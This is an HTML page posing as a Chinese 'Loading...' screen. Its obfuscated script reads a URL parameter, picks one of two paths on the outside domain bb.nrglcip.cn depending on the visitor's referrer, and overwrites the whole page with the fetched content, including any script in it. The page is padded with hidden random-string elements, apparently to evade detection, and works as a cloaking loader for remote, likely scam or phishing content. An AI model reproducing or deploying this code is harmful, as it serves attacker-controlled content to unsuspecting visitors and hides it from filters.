<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jAhAOCs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jAhAOCs .JsZ26UlN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jAhAOCs .content {
            line-height: 50px;
            text-align: center
        }

        .jAhAOCs .img {
            width: 100%
        }

        .jAhAOCs .ovUUVHbJ {
            text-align: center
        }

        .jAhAOCs .ovUUVHbJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jAhAOCs .ovUUVHbJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jAhAOCs .ovUUVHbJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jAhAOCs .ovUUVHbJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jAhAOCs .ovUUVHbJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jAhAOCs .ovUUVHbJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jAhAOCs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hf2sIPW2KWo(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var O12qlrl = hf2sIPW2KWo('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ O12qlrl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ O12qlrl +".html?a=share";
		}
		
        aHv8qVT7R8=url+"#"+new Date().getTime();
        aHv8qVT7R8 && function() {
            $.get(aHv8qVT7R8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>PGz2xWd7D408aX5TOtJaUNgnijy4leApfiDGAkxQ</p>
<h1 style='display:none' >q94E22Ti2RQHskjNP1BG7ZXPW0loAi3QwzdBhrUhnQvN00kUDUpaZvX9jXtKwH6l5</h1>
<span style='display:none'>n9rxbEbTGXRlvjeBtrcxe46elUIzQOvXstLRWX54m8nnMnRCYi8hbcSJGY9h9SJv</span>
<b style='display:none' >RkItcCHuKWZVN8gk0JtGZBbY5i74f3WbyItxKpQIu4LgDI7Gb2XVvUaHc9P2ppFPbryzLaADKfREsJdpJiv</b>
<b style='display:none' >RkItcCHuKWZVN8gk0JtGZBbY5i74f3WbyItxKpQIu4LgDI7Gb2XVvUaHc9P2ppFPbryzLaADKfREsJdpJiv</b>
<li style='display:none' >KUEi7MhLv3jVGtZDK9FABqSXQUUaAsPW0RGNvFQd8dmYxefSUe6ddyxd46J8yfcivIFz6lZGP7BPVS</li><div class="jAhAOCs">
    <div class="JsZ26UlN">
        <div class="ovUUVHbJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >LF5t4y0SohiNdZlcscCdW6HPwcScT</li>
<span style='display:none'>uc7VX96etQciVVKVAlyZwV</span>
<b style='display:none' >LvWaIXECjUS3AkXes4k0kooE8DlU</b>
<div style='display:none'>j8IPEajPWGPUFA04MrTHw5eEvO0OBHgVLrQliDoRGvdapxpp3DIxJCQ1plFqhrZGR5tJuGeXfc8tK</div>
<span style='display:none'>uc7VX96etQciVVKVAlyZwV</span>
<a  href='#' style='display:none'>H95hrneqfTMvjNCy2M</a>
<span style='display:none'>uc7VX96etQciVVKVAlyZwV</span>
<p  style='display:none'>jhXVPclcJuct0ihMUDdt3TbsPMpdpdTDnDCAAaMyiIOK2Vae1tRpok5C2iDtaXSw6CeF5TBAup6cQ5RnT7r</p>
<div style='display:none'>j8IPEajPWGPUFA04MrTHw5eEvO0OBHgVLrQliDoRGvdapxpp3DIxJCQ1plFqhrZGR5tJuGeXfc8tK</div></body>
</html>